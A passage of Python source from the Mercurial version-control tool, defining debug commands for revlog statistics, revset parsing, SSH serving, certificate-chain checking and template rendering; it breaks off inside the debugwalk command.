@command('debugpushkey', [], _('REPO NAMESPACE [KEY OLD NEW]'), norepo=True)
def debugpushkey(ui, repopath, namespace, *keyinfo, **opts):
    '''access the pushkey key/value protocol
    With two args, list the keys in the given namespace.
    With five args, set a key to new if it currently is set to old.
    Reports success or failure.
    '''
    target = hg.peer(ui, {}, repopath)
    if not keyinfo:
        # Listing mode: dump every key/value pair in the namespace.
        for k, v in sorted(target.listkeys(namespace).iteritems()):
            ui.write("%s\t%s\n" % (stringutil.escapestr(k),
                                   stringutil.escapestr(v)))
        return
    # Update mode: conditionally move KEY from OLD to NEW on the peer.
    key, old, new = keyinfo
    pushargs = {
        'namespace': namespace,
        'key': key,
        'old': old,
        'new': new,
    }
    with target.commandexecutor() as executor:
        r = executor.callcommand('pushkey', pushargs).result()
    ui.status(pycompat.bytestr(r) + '\n')
    return not r
@command('debugpvec', [], _('A B'))
def debugpvec(ui, repo, a, b=None):
    """display and compare the pvecs (parent vectors) of two revisions
    Prints each revision's pvec, their depths, the hamming distance
    between the vectors and the detected relation: '=' (equal),
    '>' / '<' (ordering), '|' (divergent) or '?' (none detected).
    """
    ca = scmutil.revsingle(repo, a)
    cb = scmutil.revsingle(repo, b)
    pa = pvec.ctxpvec(ca)
    pb = pvec.ctxpvec(cb)
    if pa == pb:
        rel = "="
    elif pa > pb:
        rel = ">"
    elif pa < pb:
        rel = "<"
    elif pa | pb:
        rel = "|"
    else:
        # Bug fix: `rel` used to be left unbound when none of the above
        # comparisons matched, crashing with UnboundLocalError in the
        # final ui.write below. Fall back to an explicit "unknown" mark.
        rel = "?"
    ui.write(_("a: %s\n") % pa)
    ui.write(_("b: %s\n") % pb)
    ui.write(_("depth(a): %d depth(b): %d\n") % (pa._depth, pb._depth))
    ui.write(_("delta: %d hdist: %d distance: %d relation: %s\n") %
             (abs(pa._depth - pb._depth), pvec._hamming(pa._vec, pb._vec),
              pa.distance(pb), rel))
@command('debugrebuilddirstate|debugrebuildstate',
    [('r', 'rev', '', _('revision to rebuild to'), _('REV')),
     ('', 'minimal', None, _('only rebuild files that are inconsistent with '
                             'the working copy parent')),
    ],
    _('[-r REV]'))
def debugrebuilddirstate(ui, repo, rev, **opts):
    """rebuild the dirstate as it would look like for the given revision
    If no revision is specified the first current parent will be used.
    The dirstate will be set to the files of the given revision.
    The actual working directory content or existing dirstate
    information such as adds or removes is not considered.
    ``minimal`` will only rebuild the dirstate status for files that claim to be
    tracked but are not in the parent manifest, or that exist in the parent
    manifest but are not in the dirstate. It will not change adds, removes, or
    modified files that are in the working copy parent.
    One use of this command is to make the next :hg:`status` invocation
    check the actual file content.
    """
    ctx = scmutil.revsingle(repo, rev)
    with repo.wlock():
        ds = repo.dirstate
        # None means "rebuild everything"; --minimal narrows it below.
        changedfiles = None
        # See command doc for what minimal does.
        if opts.get(r'minimal'):
            inmanifest = set(ctx.manifest().keys())
            indirstate = set(ds)
            # Tracked in the manifest but missing from the dirstate.
            manifestonly = inmanifest - indirstate
            # In the dirstate but not the manifest, excluding pending adds.
            dsonly = indirstate - inmanifest
            dsnotadded = {f for f in dsonly if ds[f] != 'a'}
            changedfiles = manifestonly | dsnotadded
        ds.rebuild(ctx.node(), ctx.manifest(), changedfiles)
@command('debugrebuildfncache', [], '')
def debugrebuildfncache(ui, repo):
    """rebuild the fncache file"""
    # All of the heavy lifting (scanning the store and rewriting the
    # fncache) lives in the repair module; this is just the CLI entry point.
    repair.rebuildfncache(ui, repo)
@command('debugrename',
         [('r', 'rev', '', _('revision to debug'), _('REV'))],
         _('[-r REV] FILE'))
def debugrename(ui, repo, file1, *pats, **opts):
    """dump rename information"""
    opts = pycompat.byteskwargs(opts)
    ctx = scmutil.revsingle(repo, opts.get('rev'))
    matcher = scmutil.match(ctx, (file1,) + pats, opts)
    for path in ctx.walk(matcher):
        fctx = ctx[path]
        relpath = matcher.rel(path)
        # renamed() yields (source path, source filenode) or a falsy value.
        copysource = fctx.filelog().renamed(fctx.filenode())
        if not copysource:
            ui.write(_("%s not renamed\n") % relpath)
        else:
            ui.write(_("%s renamed from %s:%s\n")
                     % (relpath, copysource[0], hex(copysource[1])))
@command('debugrevlog', cmdutil.debugrevlogopts +
    [('d', 'dump', False, _('dump index data'))],
    _('-c|-m|FILE'),
    optionalrepo=True)
def debugrevlog(ui, repo, file_=None, **opts):
    """show data and statistics about a revlog"""
    opts = pycompat.byteskwargs(opts)
    r = cmdutil.openrevlog(repo, 'debugrevlog', file_, opts)
    if opts.get("dump"):
        # --dump mode: print one raw row of index data per revision, then
        # return without computing the aggregate statistics below.
        numrevs = len(r)
        ui.write(("# rev p1rev p2rev start end deltastart base p1 p2"
                  " rawsize totalsize compression heads chainlen\n"))
        ts = 0
        heads = set()
        for rev in pycompat.xrange(numrevs):
            dbase = r.deltaparent(rev)
            if dbase == -1:
                # No delta parent: the revision is its own base.
                dbase = rev
            cbase = r.chainbase(rev)
            clen = r.chainlen(rev)
            p1, p2 = r.parentrevs(rev)
            rs = r.rawsize(rev)
            ts = ts + rs
            # Track current head set: parents stop being heads once a
            # child revision appears.
            heads -= set(r.parentrevs(rev))
            heads.add(rev)
            try:
                # cumulative rawsize over cumulative stored size so far
                compression = ts / r.end(rev)
            except ZeroDivisionError:
                compression = 0
            ui.write("%5d %5d %5d %5d %5d %10d %4d %4d %4d %7d %9d "
                     "%11d %5d %8d\n" %
                     (rev, p1, p2, r.start(rev), r.end(rev),
                      r.start(dbase), r.start(cbase),
                      r.start(p1), r.start(p2),
                      rs, ts, compression, len(heads), clen))
        return 0
    # Statistics mode: decode the revlog version/flags first.
    v = r.version
    format = v & 0xFFFF
    flags = []
    gdelta = False
    if v & revlog.FLAG_INLINE_DATA:
        flags.append('inline')
    if v & revlog.FLAG_GENERALDELTA:
        gdelta = True
        flags.append('generaldelta')
    if not flags:
        flags = ['(none)']
    ### tracks merge vs single parent
    nummerges = 0
    ### tracks ways the "delta" are build
    # nodelta
    numempty = 0
    numemptytext = 0
    numemptydelta = 0
    # full file content
    numfull = 0
    # intermediate snapshot against a prior snapshot
    numsemi = 0
    # snapshot count per depth
    numsnapdepth = collections.defaultdict(lambda: 0)
    # delta against previous revision
    numprev = 0
    # delta against first or second parent (not prev)
    nump1 = 0
    nump2 = 0
    # delta against neither prev nor parents
    numother = 0
    # delta against prev that are also first or second parent
    # (details of `numprev`)
    nump1prev = 0
    nump2prev = 0
    # data about delta chain of each revs
    chainlengths = []
    chainbases = []
    chainspans = []
    # data about each revision
    datasize = [None, 0, 0]
    fullsize = [None, 0, 0]
    semisize = [None, 0, 0]
    # snapshot count per depth
    snapsizedepth = collections.defaultdict(lambda: [None, 0, 0])
    deltasize = [None, 0, 0]
    chunktypecounts = {}
    chunktypesizes = {}
    def addsize(size, l):
        # l is a [min, max, total] accumulator triple; min starts as None.
        if l[0] is None or size < l[0]:
            l[0] = size
        if size > l[1]:
            l[1] = size
        l[2] += size
    # Single pass over all revisions, classifying each one.
    numrevs = len(r)
    for rev in pycompat.xrange(numrevs):
        p1, p2 = r.parentrevs(rev)
        delta = r.deltaparent(rev)
        if format > 0:
            addsize(r.rawsize(rev), datasize)
        if p2 != nullrev:
            nummerges += 1
        size = r.length(rev)
        if delta == nullrev:
            # Stored as a full snapshot (no delta parent).
            chainlengths.append(0)
            chainbases.append(r.start(rev))
            chainspans.append(size)
            if size == 0:
                numempty += 1
                numemptytext += 1
            else:
                numfull += 1
                numsnapdepth[0] += 1
                addsize(size, fullsize)
                addsize(size, snapsizedepth[0])
        else:
            # Stored as a delta: extend the parent's chain bookkeeping.
            chainlengths.append(chainlengths[delta] + 1)
            baseaddr = chainbases[delta]
            revaddr = r.start(rev)
            chainbases.append(baseaddr)
            chainspans.append((revaddr - baseaddr) + size)
            if size == 0:
                numempty += 1
                numemptydelta += 1
            elif r.issnapshot(rev):
                # Intermediate snapshot (delta against another snapshot).
                addsize(size, semisize)
                numsemi += 1
                depth = r.snapshotdepth(rev)
                numsnapdepth[depth] += 1
                addsize(size, snapsizedepth[depth])
            else:
                # Plain delta: classify by what the base revision is.
                addsize(size, deltasize)
                if delta == rev - 1:
                    numprev += 1
                    if delta == p1:
                        nump1prev += 1
                    elif delta == p2:
                        nump2prev += 1
                elif delta == p1:
                    nump1 += 1
                elif delta == p2:
                    nump2 += 1
                elif delta != nullrev:
                    numother += 1
        # Obtain data on the raw chunks in the revlog.
        if util.safehasattr(r, '_getsegmentforrevs'):
            segment = r._getsegmentforrevs(rev, rev)[1]
        else:
            segment = r._revlog._getsegmentforrevs(rev, rev)[1]
        if segment:
            # First byte of the stored chunk encodes the compression type.
            chunktype = bytes(segment[0:1])
        else:
            chunktype = 'empty'
        if chunktype not in chunktypecounts:
            chunktypecounts[chunktype] = 0
            chunktypesizes[chunktype] = 0
        chunktypecounts[chunktype] += 1
        chunktypesizes[chunktype] += size
    # Adjust size min value for empty cases
    for size in (datasize, fullsize, semisize, deltasize):
        if size[0] is None:
            size[0] = 0
    numdeltas = numrevs - numfull - numempty - numsemi
    numoprev = numprev - nump1prev - nump2prev
    # Convert the [min, max, total] triples' totals into averages in place.
    # NOTE(review): assumes numrevs > 0 and numfull > 0 here; an empty or
    # snapshot-free revlog would raise ZeroDivisionError -- confirm.
    totalrawsize = datasize[2]
    datasize[2] /= numrevs
    fulltotal = fullsize[2]
    fullsize[2] /= numfull
    semitotal = semisize[2]
    snaptotal = {}
    if numsemi > 0:
        semisize[2] /= numsemi
    for depth in snapsizedepth:
        snaptotal[depth] = snapsizedepth[depth][2]
        snapsizedepth[depth][2] /= numsnapdepth[depth]
    deltatotal = deltasize[2]
    if numdeltas > 0:
        deltasize[2] /= numdeltas
    totalsize = fulltotal + semitotal + deltatotal
    avgchainlen = sum(chainlengths) / numrevs
    maxchainlen = max(chainlengths)
    maxchainspan = max(chainspans)
    compratio = 1
    if totalsize:
        compratio = totalrawsize / totalsize
    # Format-string builders: widths are derived from the largest value so
    # all the columns below line up.
    basedfmtstr = '%%%dd\n'
    basepcfmtstr = '%%%dd %s(%%5.2f%%%%)\n'
    def dfmtstr(max):
        return basedfmtstr % len(str(max))
    def pcfmtstr(max, padding=0):
        return basepcfmtstr % (len(str(max)), ' ' * padding)
    def pcfmt(value, total):
        # Return (value, percentage-of-total) for the pcfmtstr templates.
        if total:
            return (value, 100 * float(value) / total)
        else:
            return value, 100.0
    ui.write(('format : %d\n') % format)
    ui.write(('flags : %s\n') % ', '.join(flags))
    ui.write('\n')
    fmt = pcfmtstr(totalsize)
    fmt2 = dfmtstr(totalsize)
    ui.write(('revisions : ') + fmt2 % numrevs)
    ui.write((' merges : ') + fmt % pcfmt(nummerges, numrevs))
    ui.write((' normal : ') + fmt % pcfmt(numrevs - nummerges, numrevs))
    ui.write(('revisions : ') + fmt2 % numrevs)
    ui.write((' empty : ') + fmt % pcfmt(numempty, numrevs))
    ui.write((' text : ')
             + fmt % pcfmt(numemptytext, numemptytext + numemptydelta))
    ui.write((' delta : ')
             + fmt % pcfmt(numemptydelta, numemptytext + numemptydelta))
    ui.write((' snapshot : ') + fmt % pcfmt(numfull + numsemi, numrevs))
    for depth in sorted(numsnapdepth):
        ui.write((' lvl-%-3d : ' % depth)
                 + fmt % pcfmt(numsnapdepth[depth], numrevs))
    ui.write((' deltas : ') + fmt % pcfmt(numdeltas, numrevs))
    ui.write(('revision size : ') + fmt2 % totalsize)
    ui.write((' snapshot : ')
             + fmt % pcfmt(fulltotal + semitotal, totalsize))
    for depth in sorted(numsnapdepth):
        ui.write((' lvl-%-3d : ' % depth)
                 + fmt % pcfmt(snaptotal[depth], totalsize))
    ui.write((' deltas : ') + fmt % pcfmt(deltatotal, totalsize))
    def fmtchunktype(chunktype):
        # Printable compression-type marker bytes are shown both as hex
        # and as the character itself; others as hex only.
        if chunktype == 'empty':
            return ' %s : ' % chunktype
        elif chunktype in pycompat.bytestr(string.ascii_letters):
            return ' 0x%s (%s) : ' % (hex(chunktype), chunktype)
        else:
            return ' 0x%s : ' % hex(chunktype)
    ui.write('\n')
    ui.write(('chunks : ') + fmt2 % numrevs)
    for chunktype in sorted(chunktypecounts):
        ui.write(fmtchunktype(chunktype))
        ui.write(fmt % pcfmt(chunktypecounts[chunktype], numrevs))
    ui.write(('chunks size : ') + fmt2 % totalsize)
    for chunktype in sorted(chunktypecounts):
        ui.write(fmtchunktype(chunktype))
        ui.write(fmt % pcfmt(chunktypesizes[chunktype], totalsize))
    ui.write('\n')
    fmt = dfmtstr(max(avgchainlen, maxchainlen, maxchainspan, compratio))
    ui.write(('avg chain length : ') + fmt % avgchainlen)
    ui.write(('max chain length : ') + fmt % maxchainlen)
    ui.write(('max chain reach : ') + fmt % maxchainspan)
    ui.write(('compression ratio : ') + fmt % compratio)
    if format > 0:
        ui.write('\n')
        ui.write(('uncompressed data size (min/max/avg) : %d / %d / %d\n')
                 % tuple(datasize))
        ui.write(('full revision size (min/max/avg) : %d / %d / %d\n')
                 % tuple(fullsize))
        ui.write(('inter-snapshot size (min/max/avg) : %d / %d / %d\n')
                 % tuple(semisize))
        for depth in sorted(snapsizedepth):
            if depth == 0:
                continue
            ui.write((' level-%-3d (min/max/avg) : %d / %d / %d\n')
                     % ((depth,) + tuple(snapsizedepth[depth])))
        ui.write(('delta size (min/max/avg) : %d / %d / %d\n')
                 % tuple(deltasize))
    if numdeltas > 0:
        ui.write('\n')
        fmt = pcfmtstr(numdeltas)
        fmt2 = pcfmtstr(numdeltas, 4)
        ui.write(('deltas against prev : ') + fmt % pcfmt(numprev, numdeltas))
        if numprev > 0:
            ui.write((' where prev = p1 : ') + fmt2 % pcfmt(nump1prev,
                                                            numprev))
            ui.write((' where prev = p2 : ') + fmt2 % pcfmt(nump2prev,
                                                            numprev))
            ui.write((' other : ') + fmt2 % pcfmt(numoprev,
                                                  numprev))
        if gdelta:
            ui.write(('deltas against p1 : ')
                     + fmt % pcfmt(nump1, numdeltas))
            ui.write(('deltas against p2 : ')
                     + fmt % pcfmt(nump2, numdeltas))
        ui.write(('deltas against other : ') + fmt % pcfmt(numother,
                                                           numdeltas))
@command('debugrevlogindex', cmdutil.debugrevlogopts +
    [('f', 'format', 0, _('revlog format'), _('FORMAT'))],
    _('[-f FORMAT] -c|-m|FILE'),
    optionalrepo=True)
def debugrevlogindex(ui, repo, file_=None, **opts):
    """dump the contents of a revlog index"""
    opts = pycompat.byteskwargs(opts)
    r = cmdutil.openrevlog(repo, 'debugrevlogindex', file_, opts)
    format = opts.get('format', 0)
    if format not in (0, 1):
        raise error.Abort(_("unknown format %d") % format)
    # --debug shows full-length node ids; otherwise the short form.
    if ui.debugflag:
        shortfn = hex
    else:
        shortfn = short
    # There might not be anything in r, so have a sane default
    idlen = 12
    for i in r:
        # Width of the node-id columns, taken from the first entry.
        idlen = len(shortfn(r.node(i)))
        break
    # Print the header row matching the selected format/verbosity.
    if format == 0:
        if ui.verbose:
            ui.write((" rev offset length linkrev"
                     " %s %s p2\n") % ("nodeid".ljust(idlen),
                                       "p1".ljust(idlen)))
        else:
            ui.write((" rev linkrev %s %s p2\n") % (
                "nodeid".ljust(idlen), "p1".ljust(idlen)))
    elif format == 1:
        if ui.verbose:
            ui.write((" rev flag offset length size link p1"
                     " p2 %s\n") % "nodeid".rjust(idlen))
        else:
            ui.write((" rev flag size link p1 p2 %s\n") %
                     "nodeid".rjust(idlen))
    for i in r:
        node = r.node(i)
        if format == 0:
            try:
                pp = r.parents(node)
            except Exception:
                # Fall back to null parents if lookup fails for any reason.
                pp = [nullid, nullid]
            if ui.verbose:
                ui.write("% 6d % 9d % 7d % 7d %s %s %s\n" % (
                    i, r.start(i), r.length(i), r.linkrev(i),
                    shortfn(node), shortfn(pp[0]), shortfn(pp[1])))
            else:
                ui.write("% 6d % 7d %s %s %s\n" % (
                    i, r.linkrev(i), shortfn(node), shortfn(pp[0]),
                    shortfn(pp[1])))
        elif format == 1:
            pr = r.parentrevs(i)
            if ui.verbose:
                ui.write("% 6d %04x % 8d % 8d % 8d % 6d % 6d % 6d %s\n" % (
                    i, r.flags(i), r.start(i), r.length(i), r.rawsize(i),
                    r.linkrev(i), pr[0], pr[1], shortfn(node)))
            else:
                ui.write("% 6d %04x % 8d % 6d % 6d % 6d %s\n" % (
                    i, r.flags(i), r.rawsize(i), r.linkrev(i), pr[0], pr[1],
                    shortfn(node)))
@command('debugrevspec',
    [('', 'optimize', None,
      _('print parsed tree after optimizing (DEPRECATED)')),
     ('', 'show-revs', True, _('print list of result revisions (default)')),
     ('s', 'show-set', None, _('print internal representation of result set')),
     ('p', 'show-stage', [],
      _('print parsed tree at the given stage'), _('NAME')),
     ('', 'no-optimized', False, _('evaluate tree without optimization')),
     ('', 'verify-optimized', False, _('verify optimized result')),
     ],
    ('REVSPEC'))
def debugrevspec(ui, repo, expr, **opts):
    """parse and apply a revision specification
    Use -p/--show-stage option to print the parsed tree at the given stages.
    Use -p all to print tree at every stage.
    Use --no-show-revs option with -s or -p to print only the set
    representation or the parsed tree respectively.
    Use --verify-optimized to compare the optimized result with the unoptimized
    one. Returns 1 if the optimized result differs.
    """
    opts = pycompat.byteskwargs(opts)
    aliases = ui.configitems('revsetalias')
    # The parse pipeline: each stage transforms the tree produced by the
    # previous one. 'optimized' is dropped when --no-optimized is given.
    stages = [
        ('parsed', lambda tree: tree),
        ('expanded', lambda tree: revsetlang.expandaliases(tree, aliases,
                                                           ui.warn)),
        ('concatenated', revsetlang.foldconcat),
        ('analyzed', revsetlang.analyze),
        ('optimized', revsetlang.optimize),
    ]
    if opts['no_optimized']:
        stages = stages[:-1]
    if opts['verify_optimized'] and opts['no_optimized']:
        raise error.Abort(_('cannot use --verify-optimized with '
                            '--no-optimized'))
    stagenames = set(n for n, f in stages)
    # showalways: stages always printed; showchanged: printed only when
    # the stage actually changed the tree.
    showalways = set()
    showchanged = set()
    if ui.verbose and not opts['show_stage']:
        # show parsed tree by --verbose (deprecated)
        showalways.add('parsed')
        showchanged.update(['expanded', 'concatenated'])
    if opts['optimize']:
        showalways.add('optimized')
    if opts['show_stage'] and opts['optimize']:
        raise error.Abort(_('cannot use --optimize with --show-stage'))
    if opts['show_stage'] == ['all']:
        showalways.update(stagenames)
    else:
        for n in opts['show_stage']:
            if n not in stagenames:
                raise error.Abort(_('invalid stage name: %s') % n)
        showalways.update(opts['show_stage'])
    # Run the pipeline, remembering each stage's tree for --verify-optimized.
    treebystage = {}
    printedtree = None
    tree = revsetlang.parse(expr, lookup=revset.lookupfn(repo))
    for n, f in stages:
        treebystage[n] = tree = f(tree)
        if n in showalways or (n in showchanged and tree != printedtree):
            if opts['show_stage'] or n != 'parsed':
                ui.write(("* %s:\n") % n)
            ui.write(revsetlang.prettyformat(tree), "\n")
            printedtree = tree
    if opts['verify_optimized']:
        # Evaluate both the analyzed and the optimized tree and diff the
        # resulting revision sequences; exit status 1 on mismatch.
        arevs = revset.makematcher(treebystage['analyzed'])(repo)
        brevs = revset.makematcher(treebystage['optimized'])(repo)
        if opts['show_set'] or (opts['show_set'] is None and ui.verbose):
            ui.write(("* analyzed set:\n"), stringutil.prettyrepr(arevs), "\n")
            ui.write(("* optimized set:\n"), stringutil.prettyrepr(brevs), "\n")
        arevs = list(arevs)
        brevs = list(brevs)
        if arevs == brevs:
            return 0
        ui.write(('--- analyzed\n'), label='diff.file_a')
        ui.write(('+++ optimized\n'), label='diff.file_b')
        sm = difflib.SequenceMatcher(None, arevs, brevs)
        for tag, alo, ahi, blo, bhi in sm.get_opcodes():
            if tag in ('delete', 'replace'):
                for c in arevs[alo:ahi]:
                    ui.write('-%s\n' % c, label='diff.deleted')
            if tag in ('insert', 'replace'):
                for c in brevs[blo:bhi]:
                    ui.write('+%s\n' % c, label='diff.inserted')
            if tag == 'equal':
                for c in arevs[alo:ahi]:
                    ui.write(' %s\n' % c)
        return 1
    func = revset.makematcher(tree)
    revs = func(repo)
    if opts['show_set'] or (opts['show_set'] is None and ui.verbose):
        ui.write(("* set:\n"), stringutil.prettyrepr(revs), "\n")
    if not opts['show_revs']:
        return
    for c in revs:
        ui.write("%d\n" % c)
@command('debugserve', [
    ('', 'sshstdio', False, _('run an SSH server bound to process handles')),
    ('', 'logiofd', '', _('file descriptor to log server I/O to')),
    ('', 'logiofile', '', _('file to log server I/O to')),
], '')
def debugserve(ui, repo, **opts):
    """run a server with advanced settings
    This command is similar to :hg:`serve`. It exists partially as a
    workaround to the fact that ``hg serve --stdio`` must have specific
    arguments for security reasons.
    """
    opts = pycompat.byteskwargs(opts)
    # Only the SSH-over-stdio transport is implemented by this command.
    if not opts['sshstdio']:
        raise error.Abort(_('only --sshstdio is currently supported'))
    logfh = None
    # --logiofd and --logiofile are alternative log destinations; at most
    # one may be given.
    if opts['logiofd'] and opts['logiofile']:
        raise error.Abort(_('cannot use both --logiofd and --logiofile'))
    if opts['logiofd']:
        # Line buffered because output is line based.
        try:
            logfh = os.fdopen(int(opts['logiofd']), r'ab', 1)
        except OSError as e:
            # Any failure other than "can't seek" is a real error.
            if e.errno != errno.ESPIPE:
                raise
            # can't seek a pipe, so `ab` mode fails on py3
            logfh = os.fdopen(int(opts['logiofd']), r'wb', 1)
    elif opts['logiofile']:
        logfh = open(opts['logiofile'], 'ab', 1)
    # Blocks handling requests on stdin/stdout until the client goes away.
    s = wireprotoserver.sshserver(ui, repo, logfh=logfh)
    s.serve_forever()
@command('debugsetparents', [], _('REV1 [REV2]'))
def debugsetparents(ui, repo, rev1, rev2=None):
    """manually set the parents of the current working directory
    This is useful for writing repository conversion tools, but should
    be used with care. For example, neither the working directory nor the
    dirstate is updated, so file status may be incorrect after running this
    command.
    Returns 0 on success.
    """
    # Resolve both revisions before taking the lock; a missing second
    # parent defaults to the null revision.
    first = scmutil.revsingle(repo, rev1).node()
    second = scmutil.revsingle(repo, rev2, 'null').node()
    with repo.wlock():
        repo.setparents(first, second)
@command('debugssl', [], '[SOURCE]', optionalrepo=True)
def debugssl(ui, repo, source=None, **opts):
    '''test a secure connection to a server
    This builds the certificate chain for the server on Windows, installing the
    missing intermediates and trusted root via Windows Update if necessary. It
    does nothing on other platforms.
    If SOURCE is omitted, the 'default' path will be used. If a URL is given,
    that server is used. See :hg:`help urls` for more information.
    If the update succeeds, retry the original operation. Otherwise, the cause
    of the SSL error is likely another issue.
    '''
    if not pycompat.iswindows:
        raise error.Abort(_('certificate chain building is only possible on '
                            'Windows'))
    if not source:
        # No explicit SOURCE: fall back to the repo's 'default' path.
        if not repo:
            raise error.Abort(_("there is no Mercurial repository here, and no "
                                "server specified"))
        source = "default"
    source, branches = hg.parseurl(ui.expandpath(source))
    url = util.url(source)
    addr = None
    # Only schemes with a well-known default port can be probed.
    defaultport = {'https': 443, 'ssh': 22}
    if url.scheme in defaultport:
        try:
            addr = (url.host, int(url.port or defaultport[url.scheme]))
        except ValueError:
            raise error.Abort(_("malformed port number in URL"))
    else:
        raise error.Abort(_("only https and ssh connections are supported"))
    # Imported here because the win32 module only imports on Windows.
    from . import win32
    # Verification is intentionally disabled: we only need the peer's raw
    # certificate so Windows can build (and possibly repair) the chain.
    s = ssl.wrap_socket(socket.socket(), ssl_version=ssl.PROTOCOL_TLS,
                        cert_reqs=ssl.CERT_NONE, ca_certs=None)
    try:
        s.connect(addr)
        cert = s.getpeercert(True)
        ui.status(_('checking the certificate chain for %s\n') % url.host)
        # First pass only inspects the chain (build=False).
        complete = win32.checkcertificatechain(cert, build=False)
        if not complete:
            ui.status(_('certificate chain is incomplete, updating... '))
            # Second pass asks Windows Update to fetch missing certs.
            if not win32.checkcertificatechain(cert):
                ui.status(_('failed.\n'))
            else:
                ui.status(_('done.\n'))
        else:
            ui.status(_('full certificate chain is available\n'))
    finally:
        s.close()
@command('debugsub',
    [('r', 'rev', '',
      _('revision to check'), _('REV'))],
    _('[-r REV] [REV]'))
def debugsub(ui, repo, rev=None):
    # Dump the subrepo state of a changeset: one (path, source, revision)
    # record per subrepository, ordered by path.
    ctx = scmutil.revsingle(repo, rev, None)
    for path, state in sorted(ctx.substate.items()):
        ui.write(('path %s\n') % path)
        ui.write((' source %s\n') % state[0])
        ui.write((' revision %s\n') % state[1])
@command('debugsuccessorssets',
    [('', 'closest', False, _('return closest successors sets only'))],
    _('[REV]'))
def debugsuccessorssets(ui, repo, *revs, **opts):
    """show set of successors for revision
    A successors set of changeset A is a consistent group of revisions that
    succeed A. It contains non-obsolete changesets only unless closests
    successors set is set.
    In most cases a changeset A has a single successors set containing a single
    successor (changeset A replaced by A').
    A changeset that is made obsolete with no successors are called "pruned".
    Such changesets have no successors sets at all.
    A changeset that has been "split" will have a successors set containing
    more than one successor.
    A changeset that has been rewritten in multiple different ways is called
    "divergent". Such changesets have multiple successor sets (each of which
    may also be split, i.e. have multiple successors).
    Results are displayed as follows::
    <rev1>
    <successors-1A>
    <rev2>
    <successors-2A>
    <successors-2B1> <successors-2B2> <successors-2B3>
    Here rev2 has two possible (i.e. divergent) successors sets. The first
    holds one element, whereas the second holds three (i.e. the changeset has
    been split).
    """
    # Shared cache reused across successorssets() calls for speed.
    cache = {}
    ctx2str = bytes
    node2str = short
    for rev in scmutil.revrange(repo, revs):
        ctx = repo[rev]
        ui.write('%s\n' % ctx2str(ctx))
        for succsset in obsutil.successorssets(repo, ctx.node(),
                                               closest=opts[r'closest'],
                                               cache=cache):
            if succsset:
                # One indented line per successors set.
                ui.write(' ')
                ui.write(' '.join(node2str(n) for n in succsset))
            ui.write('\n')
@command('debugtemplate',
    [('r', 'rev', [], _('apply template on changesets'), _('REV')),
     ('D', 'define', [], _('define template keyword'), _('KEY=VALUE'))],
    _('[-r REV]... [-D KEY=VALUE]... TEMPLATE'),
    optionalrepo=True)
def debugtemplate(ui, repo, tmpl, **opts):
    """parse and apply a template
    If -r/--rev is given, the template is processed as a log template and
    applied to the given changesets. Otherwise, it is processed as a generic
    template.
    Use --verbose to print the parsed tree.
    """
    revs = None
    if opts[r'rev']:
        if repo is None:
            raise error.RepoError(_('there is no Mercurial repository here '
                                    '(.hg not found)'))
        revs = scmutil.revrange(repo, opts[r'rev'])
    # Collect -D KEY=VALUE pairs into the template property dict.
    props = {}
    for definition in opts[r'define']:
        try:
            key, val = (part.strip() for part in definition.split('=', 1))
            # 'ui' is a reserved resource name and empty keys are invalid.
            if not key or key == 'ui':
                raise ValueError
            props[key] = val
        except ValueError:
            raise error.Abort(_('malformed keyword definition: %s')
                              % definition)
    if ui.verbose:
        # Dump the parse tree, and the alias-expanded tree when it differs.
        aliases = ui.configitems('templatealias')
        tree = templater.parse(tmpl)
        ui.note(templater.prettyformat(tree), '\n')
        newtree = templater.expandaliases(tree, aliases)
        if newtree != tree:
            ui.note(("* expanded:\n"), templater.prettyformat(newtree), '\n')
    if revs is None:
        # Generic template: render once with the default resources.
        tres = formatter.templateresources(ui, repo)
        t = formatter.maketemplater(ui, tmpl, resources=tres)
        if ui.verbose:
            kwds, funcs = t.symbolsuseddefault()
            ui.write(("* keywords: %s\n") % ', '.join(sorted(kwds)))
            ui.write(("* functions: %s\n") % ', '.join(sorted(funcs)))
        ui.write(t.renderdefault(props))
    else:
        # Log template: render once per requested changeset.
        displayer = logcmdutil.maketemplater(ui, repo, tmpl)
        if ui.verbose:
            kwds, funcs = displayer.t.symbolsuseddefault()
            ui.write(("* keywords: %s\n") % ', '.join(sorted(kwds)))
            ui.write(("* functions: %s\n") % ', '.join(sorted(funcs)))
        for r in revs:
            displayer.show(repo[r], **pycompat.strkwargs(props))
        displayer.close()
@command('debuguigetpass', [
    ('p', 'prompt', '', _('prompt text'), _('TEXT')),
], _('[-p TEXT]'), norepo=True)
def debuguigetpass(ui, prompt=''):
    """show prompt to type password"""
    r = ui.getpass(prompt)
    # Fix: the output label previously read 'respose'; spell it 'response'
    # for correctness and consistency with the sibling debuguiprompt command.
    ui.write(('response: %s\n') % r)
@command('debuguiprompt', [
    ('p', 'prompt', '', _('prompt text'), _('TEXT')),
], _('[-p TEXT]'), norepo=True)
def debuguiprompt(ui, prompt=''):
    """show plain prompt"""
    # Echo the user's answer back with a fixed prefix for test matching.
    answer = ui.prompt(prompt)
    ui.write(('response: %s\n') % answer)
@command('debugupdatecaches', [])
def debugupdatecaches(ui, repo, *pats, **opts):
    """warm all known caches in the repository"""
    # Hold both the wlock and the store lock so every cache can be
    # rebuilt safely in one pass.
    with repo.wlock(), repo.lock():
        repo.updatecaches(full=True)
@command('debugupgraderepo', [
    ('o', 'optimize', [], _('extra optimization to perform'), _('NAME')),
    ('', 'run', False, _('performs an upgrade')),
])
def debugupgraderepo(ui, repo, run=False, optimize=None):
    """upgrade a repository to use different features
    If no arguments are specified, the repository is evaluated for upgrade
    and a list of problems and potential optimizations is printed.
    With ``--run``, a repository upgrade is performed. Behavior of the upgrade
    can be influenced via additional arguments. More details will be provided
    by the command output when run without ``--run``.
    During the upgrade, the repository will be locked and no writes will be
    allowed.
    At the end of the upgrade, the repository may not be readable while new
    repository data is swapped in. This window will be as long as it takes to
    rename some directories inside the ``.hg`` directory. On most machines, this
    should complete almost instantaneously and the chances of a consumer being
    unable to access the repository should be low.
    """
    # Thin wrapper: all of the heavy lifting lives in the upgrade module.
    return upgrade.upgraderepo(ui, repo, run=run, optimize=optimize)
@command('debugwalk', cmdutil.walkopts, _('[OPTION]... [FILE]...'),
         inferrepo=True)
def debugwalk(ui, repo, *pats, **opts):
    """show how files match on given patterns"""
    opts = pycompat.byteskwargs(opts)
    matcher = scmutil.match(repo[None], pats, opts)
    if ui.verbose:
        ui.write(('* matcher:\n'), stringutil.prettyrepr(matcher), '\n')
    paths = list(repo[None].walk(matcher))
    if not paths:
        return
    # Normalize path separators only when 'ui.slash' requests it on a
    # platform whose native separator is not '/'.
